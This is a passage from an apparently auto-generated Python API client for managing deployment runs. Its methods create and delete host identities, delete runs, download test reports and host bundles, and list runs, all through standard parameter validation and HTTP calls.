all_params = ['id', 'runid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_category_to_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_category_to_deployment_run`") # noqa: E501
# verify the required parameter 'runid' is set
if self.api_client.client_side_validation and ('runid' not in local_var_params or # noqa: E501
local_var_params['runid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `runid` when calling `add_category_to_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'runid' in local_var_params and local_var_params['runid'] is not None: # noqa: E501
query_params.append(('runid', local_var_params['runid'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/categories/{id}/run', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_identity(self, id, hostid, cloud_resource_object, **kwargs): # noqa: E501
"""Create a host identity # noqa: E501
Creates an identity for the deployment run host with access to the resources requested by the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_identity(id, hostid, cloud_resource_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param list[CloudResourceObject] cloud_resource_object: The cloud resources to be accessed by the host identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_identity_with_http_info(id, hostid, cloud_resource_object, **kwargs) # noqa: E501
def create_identity_with_http_info(self, id, hostid, cloud_resource_object, **kwargs): # noqa: E501
"""Create a host identity # noqa: E501
Creates an identity for the deployment run host with access to the resources requested by the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_identity_with_http_info(id, hostid, cloud_resource_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param list[CloudResourceObject] cloud_resource_object: The cloud resources to be accessed by the host identity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'cloud_resource_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_identity`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `create_identity`") # noqa: E501
# verify the required parameter 'cloud_resource_object' is set
if self.api_client.client_side_validation and ('cloud_resource_object' not in local_var_params or # noqa: E501
local_var_params['cloud_resource_object'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `cloud_resource_object` when calling `create_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cloud_resource_object' in local_var_params:
body_params = local_var_params['cloud_resource_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_deployment_run(self, id, **kwargs): # noqa: E501
"""Delete Deployment Run # noqa: E501
Deletes a single inactive Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool purge: Delete all dependencies of the deployment run
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def delete_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete Deployment Run # noqa: E501
Deletes a single inactive Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool purge: Delete all dependencies of the deployment run
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'purge'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'purge' in local_var_params and local_var_params['purge'] is not None: # noqa: E501
query_params.append(('purge', local_var_params['purge'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identity(self, id, hostid, **kwargs): # noqa: E501
"""Delete host identity # noqa: E501
Deletes the identity of a deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_with_http_info(id, hostid, **kwargs) # noqa: E501
def delete_identity_with_http_info(self, id, hostid, **kwargs): # noqa: E501
"""Delete host identity # noqa: E501
Deletes the identity of a deployment run host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_with_http_info(id, hostid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `delete_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identity_by_id(self, id, hostid, username, **kwargs): # noqa: E501
"""Deletes identity for specified user # noqa: E501
Deletes an identity for a user specified by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_by_id(id, hostid, username, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str username: Username of the identity to be deleted (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[BaseIdentity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_by_id_with_http_info(id, hostid, username, **kwargs) # noqa: E501
def delete_identity_by_id_with_http_info(self, id, hostid, username, **kwargs): # noqa: E501
"""Deletes identity for specified user # noqa: E501
Deletes an identity for a user specified by name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_by_id_with_http_info(id, hostid, username, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str username: Username of the identity to be deleted (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[BaseIdentity], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_identity_by_id`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `delete_identity_by_id`") # noqa: E501
# verify the required parameter 'username' is set
if self.api_client.client_side_validation and ('username' not in local_var_params or # noqa: E501
local_var_params['username'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `username` when calling `delete_identity_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/identity/{username}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[BaseIdentity]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def download_deployment_run_test_report(self, id, **kwargs): # noqa: E501
"""Download Report # noqa: E501
Downloads a single Test Report for the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_deployment_run_test_report(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str file: Report file name
:param str number: Report number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.download_deployment_run_test_report_with_http_info(id, **kwargs) # noqa: E501
def download_deployment_run_test_report_with_http_info(self, id, **kwargs): # noqa: E501
"""Download Report # noqa: E501
Downloads a single Test Report for the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_deployment_run_test_report_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str file: Report file name
:param str number: Report number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'file', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method download_deployment_run_test_report" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `download_deployment_run_test_report`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'file' in local_var_params and local_var_params['file'] is not None: # noqa: E501
query_params.append(('file', local_var_params['file'])) # noqa: E501
if 'number' in local_var_params and local_var_params['number'] is not None: # noqa: E501
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/downloadreport', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def download_host(self, id, role, **kwargs): # noqa: E501
"""Download Host # noqa: E501
Downloads a single Host Bundle for the specified Deployment Run.<br> <br> Based on the background flag, the download will either be done in the foreground (false), background (true), or be determined by asset size (no value).<br> <br> If the background flag is set to true (or no value for the background flag is provided), and the host is larger than the site threshold, it will be prepared for download in the background and an email with a link to retrieve the asset will be sent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_host(id, role, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str role: Name of host to bundle for download (required)
:param bool background: Force the download to happen in the background
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.download_host_with_http_info(id, role, **kwargs) # noqa: E501
def download_host_with_http_info(self, id, role, **kwargs): # noqa: E501
"""Download Host # noqa: E501
Downloads a single Host Bundle for the specified Deployment Run.<br> <br> Based on the background flag, the download will either be done in the foreground (false), background (true), or be determined by asset size (no value).<br> <br> If the background flag is set to true (or no value for the background flag is provided), and the host is larger than the site threshold, it will be prepared for download in the background and an email with a link to retrieve the asset will be sent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_host_with_http_info(id, role, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str role: Name of host to bundle for download (required)
:param bool background: Force the download to happen in the background
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'role', 'background'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method download_host" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `download_host`") # noqa: E501
# verify the required parameter 'role' is set
if self.api_client.client_side_validation and ('role' not in local_var_params or # noqa: E501
local_var_params['role'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `role` when calling `download_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'role' in local_var_params and local_var_params['role'] is not None: # noqa: E501
query_params.append(('role', local_var_params['role'])) # noqa: E501
if 'background' in local_var_params and local_var_params['background'] is not None: # noqa: E501
query_params.append(('background', local_var_params['background'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/downloadhost', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_run(self, id, **kwargs): # noqa: E501
"""Retrieve Deployment Run # noqa: E501
Returns a single Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullDeploymentRun
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def get_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve Deployment Run # noqa: E501
Returns a single Deployment Run by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullDeploymentRun, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullDeploymentRun', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_run_reports(self, id, **kwargs): # noqa: E501
"""List Reports # noqa: E501
Returns a collection of the Test Reports for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_reports(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_run_reports_with_http_info(id, **kwargs) # noqa: E501
def get_deployment_run_reports_with_http_info(self, id, **kwargs): # noqa: E501
"""List Reports # noqa: E501
Returns a collection of the Test Reports for a single Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_run_reports_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[str], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployment_run_reports" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployment_run_reports`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/reports', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployment_runs(self, id, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs for a single Deployment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[MinimalDeploymentRun]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployment_runs_with_http_info(id, **kwargs) # noqa: E501
def get_deployment_runs_with_http_info(self, id, **kwargs): # noqa: E501
"""List Deployment Runs # noqa: E501
Returns a collection of the Deployment Runs for a single Deployment. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployment_runs_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment (required)
:param int maxresults: Maximum number of results to return
:param int page: Requested page number
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
